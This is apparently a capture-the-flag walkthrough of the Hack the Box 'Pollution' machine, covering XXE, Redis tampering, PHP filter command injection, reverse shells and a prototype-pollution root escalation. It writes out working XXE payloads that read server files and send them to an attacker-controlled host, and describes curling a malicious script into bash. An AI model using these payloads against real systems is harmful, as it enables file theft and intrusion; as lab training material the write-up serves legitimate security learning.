- What will you gain from the Pollution machine?
- Information Gathering on Pollution Machine
- Enumerate the subdomain "forum.collect.htb"
- XXE attack on the machine
- Redis-Cli command
- Enumerate the MySQL database
- Another method to get a foothold on pollution machine
- Escalate to Root Privileges Access
- Extra Information
In this post, I would like to share a walkthrough of the Pollution Machine from Hack the Box
This room will be considered a Hard machine on Hack the Box
What will you gain from the Pollution machine?
For the user flag, you will need to enumerate the website via burpsuite and find an attachment that contains a token to which we can take advantage of admin privileges to access the website. We can execute the XML external entity (XXE) injection. We also can obtain the access to redis server which we can modify to get access to the developer’s site. Once we access the developer’s site, we can execute the PHP filter Injection to obtain the reverse shell connection.
As for the root flag, you need to exploit a prototype pollution vulnerability which we should get execution and a shell on the root shell
Information Gathering on Pollution Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Let’s access the website interface
On the website interface, there’s not much of thing that we can login and register function
Therefore, let’s register our new account as shown in the screenshot above.
Let’s try to login with the credentials that we created earlier.
As a result, we have successfully accessed the home page which means we managed to register and login to the page.
From the gobuster output, we have managed to sight a subdomain for the machine such as forum.collect.htb and developers.collect.htb
The screenshot above shows the website interface for the forum interface
Sadly, we don’t have any credentials that we can use to login over here.
Enumerate the subdomain “forum.collect.htb”
When we analyze the forum page, I notice that there are a few users available within the member list
Let’s register the username on the forum website
Finally, we have successfully registered and login on to the forum’s dashboard
There is one message left on the forum that sounds like “I am unable to login to the Pollution API” by Victor
As shown in the screenshot above, Victor did leave an attachment of the proxy_history
Inside the proxy_history file, I found a base64 encoded which could be useful for us
We have obtained the packet which leads to setting the admin role
The screenshot above shows the original packet for the collect.htb
We should set our account role as admin via Burpsuite
At last, we managed to access the admin page on the collect.htb
The screenshot above shows the interface on the browser version.
XXE attack on the machine
The website interface has an xxe vulnerability that we can take advantage of.
The user already exists
Let’s start our Python server on our machine itself.
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../index.php'> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<IP ADDRESS>/?file=%file;'>"> %eval; %exfiltrate;
The dtd code can be written as shown above
We should execute the XXE attack which uses the payload as shown below
manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP ADDRESS>/dark.dtd"> %xxe;]><root> <method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>
By default, we can use and change the payload so that we can retrieve any file from our attacker’s machine.
We managed to obtain a hash from the attack
The hash has been identified as apache md5
At last, we managed to obtain a password from the hashes
Therefore, let’s connect the redis-cli command as shown in the screenshot above
We should be giving permission from the admin to our own user “darknite”
At last, we managed to access the dashboard using those credentials.
We are required to create a file that contains a reverse shell
As a result, let’s start our Python server
We should generate the PHP filter for PHPinfo which we can test for the visible purpose
Boom! We have managed to be sighted on the PHPinfo which we know the PHP filter works
Let’s try the command injection for this purpose
As we expected, it works which it provides the output of “www-data”
Therefore, let’s replace the command with trying to curl our malicious file and execute it as bash
Therefore, we managed to upload the malicious file to the machine
As a result, we have successfully accessed the machine via the reverse shell
We have a bunch of PHP files that we could investigate into
Enumerate the MySQL database
From one of the PHP files, we found a password for the MySQL database.
At last, we should be accessing the MySQL database via the credentials that we found earlier.
However, there’s nothing that we can use from the MySQL database.
When looking at the port that has been open on the machine, i notice that there’s one port which not commonly used.
We should transfer the fpm.py that we download from here
By default, we should be able to execute the command above but sadly it shows the error “File not found”
As a result, we should create the file “darknite.php”
Boom! We have the command injection to work on the machine
Therefore, let’s add our own SSH public key to the machine
Finally, we managed to access the machine via SSH service
We can read the user flag by typing the “cat user.txt” command
Another method to get a foothold on pollution machine
Sadly, it doesn’t work anymore when i try to test the Python script before this writeup is release
We managed to see there is a user called Victor that runs bash
We should be creating a bash file that contains something as shown above which the script can be found here
As a result, we should be able to run the file in order to retrieve a reverse connection
Finally, we managed to obtain the reverse shell connection back to us.
Escalate to Root Privileges Access
After roaming the. machine, i notice that there’s a file in which i found a pollution_api directory that we can investigate later.
We can access back the MySQL database, but we will be using the pollution_api these times.
There are two tables which we can investigate the user’s tables
However, there’s nothing useful from the user’s tables but we can change the roles instead
The command above will update the database from a normal user to an admin role
We can trigger the database by running the “curl” command
Boom! The /bin/bash has been change to SUID binary which we can change to a root shell
We can read the root flag by typing the “cat /root/root.txt” command